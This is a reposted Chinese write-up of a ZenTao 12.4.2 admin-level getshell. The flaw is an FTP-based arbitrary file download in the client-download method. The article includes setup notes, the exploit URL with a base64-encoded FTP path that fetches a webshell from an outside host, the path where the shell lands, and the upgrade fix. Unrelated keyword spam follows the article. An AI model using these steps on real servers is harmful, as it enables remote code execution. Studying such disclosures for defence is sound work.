千家信息网

禅道12.4.2后台管理员权限Getshell是怎样的

发表于:2025-02-01 作者:千家信息网编辑
千家信息网最后更新 2025年02月01日,本篇文章给大家分享的是有关禅道12.4.2后台管理员权限Getshell是怎样的,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。0x00简
千家信息网最后更新 2025年02月01日禅道12.4.2后台管理员权限Getshell是怎样的

本篇文章给大家分享的是有关禅道12.4.2后台管理员权限Getshell是怎样的,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

0x00简介

禅道是一款专业的国产开源研发项目管理软件,集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,完整覆盖了研发项目管理的核心流程。管理思想基于国际流行的敏捷项目管理方法--Scrum,在遵循其价值观的基础上,结合国内项目研发现状,整合了任务管理、需求管理、Bug管理、用例管理等多种功能,覆盖软件从计划到发布的整个生命周期。

0x01漏洞概述

禅道12.4.2版本存在任意文件下载漏洞,该漏洞是因为client类中download方法中过滤不严谨可以使用ftp达成下载文件的目的。且下载文件存储目录可解析php文件,造成getshell。

0x02影响版本

禅道≤ 12.4.2

0x03环境搭建

phpstudy2018 + 禅道12.4.2 禅道官方下载地址:

https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html

3.1. 下载完成后,放入phpstudy中安装即可

3.2. 检查扩展,要是存在未通过的扩展,在phpstudy中开启扩展即可。

3.3.设置数据库信息,这里设置成自己的数据库配置。

3.4.设置账号安装完成

3.4.利用环境搭建,开启ftp服务,以windows2008R2为例,在添加角色,添加ftp

3.5.然后在Internet信息服务下的网站添加ftp服务。

3.6.根据自己的情况配置,下一步即可

3.7.在ftp目录下放一个webshell然后浏览器查看ftp是否可以正常访问

0x04漏洞复现

1.首先把ftp加上shell的路径进行base64编码

加密前: ftp://192.168.3.200/shell.php

加密后: ZnRwJTNBLy8xOTIuMTY4LjMuMjAwL3NoZWxsLnBocA==

2.使用EXP,把加密后的base64放入exp中的<>里

http://127.0.0.1/zentaopms/www/index.php/client-download-1--1.html

3.使用以下链接路径测试是否shell已下载到服务器

http://192.168.3.200/zentaopms/www/data/client/1/shell.php

0x05修复方式

1、升级到禅道12.4.3及之后的版本

以上就是禅道12.4.2后台管理员权限Getshell是怎样的,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注行业资讯频道。

管理 项目 文件 漏洞 项目管理 服务 版本 加密 后台 权限 管理员 信息 数据 数据库 方法 更多 环境 目录 知识 篇文章 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 泛微科技与移动互联网 金华漫酷网络技术有限公司 杭州博汇网络技术有限公司 数据库查询时间的条件查询 广西内网渗透网络安全 如何打造最好的网络安全 奉贤区一站式数据库服务制品价格 软件开发的经费来源 服务器怎么拷数据快一些 信息技术网络安全 查询数据库所有信息 房产中介数据库 佛山服务器招商加盟 什么样的企业需要数据库 网络安全看什么书好吗知乎 安卓手机如何使用联想的服务器 网络安全 创意大赛 博罗软件开发 武汉信创网络安全 软件工程对软件开发的作用与意义 杭州博汇网络技术有限公司 浪潮服务器bios格式化磁盘 mysql数据库表的类型 什么软件可以收集数据库 中国特种设备数据库查询 win 服务器搭建ss 数据库数据出现过没有 淘宝直播间权重做网络技术人 西宁网络安全工程师朝阳行业 飞车手游中国有几个服务器
0